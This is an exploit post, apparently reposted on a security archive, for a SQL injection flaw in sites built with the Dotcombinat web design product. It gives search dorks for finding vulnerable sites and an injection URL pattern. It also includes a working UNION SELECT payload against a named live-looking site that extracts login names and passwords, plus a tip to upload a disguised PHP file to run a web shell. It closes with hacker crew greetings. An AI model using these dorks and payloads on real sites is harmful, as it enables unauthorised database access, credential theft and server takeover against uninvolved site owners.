Dotcombinat suffers from a remote SQL injection vulnerability.
68a5dcc077787b7f9952f9fa102af7601076ada81fc62ae04d56c721b96f7bd4-------------------- IN The NAme OF God --------------------
-====Dotcombinat Remote Sql Injection Vulnerability====-
#################################################################
#
#
# Exploit Title: Dotcombinat Remote Sql Injection Vulnerability
#
# Exploit Author: Mr.XpR
#
# SCript Download : http://www.dotcombinat.net
#
# Tested on: BackTrack , 7 , Redhat
#
# MAil : No0pm@yahoo.com
#
#
#################################################################
-====Dork====-
intext:webdesign: dotcombinat berlin inurl:?id=
intext:webdesign: dotcombinat
-====Exploit====-
http://Site.C0M/detail.php?id=[Sqli]
-====Example====-
http://www.gretchen-club.de/detail.php?id=-116+union+select+1,2,3,group_concat%28name,0x3a,passwort%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login
-====information====-
This metod is sql injection with no Sql error
And Upload Image ==> 1.php.jpg and run shell
-====Tnx To====-
Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz
MR.XpR - MMT - Samim.s - FarbodEZRaeL - MR.F@rdin- Inj3Ctor - Black.Viper - UnknowN
Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...
And All IraNHAck Security Team Members IRANHaCK.ORG
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed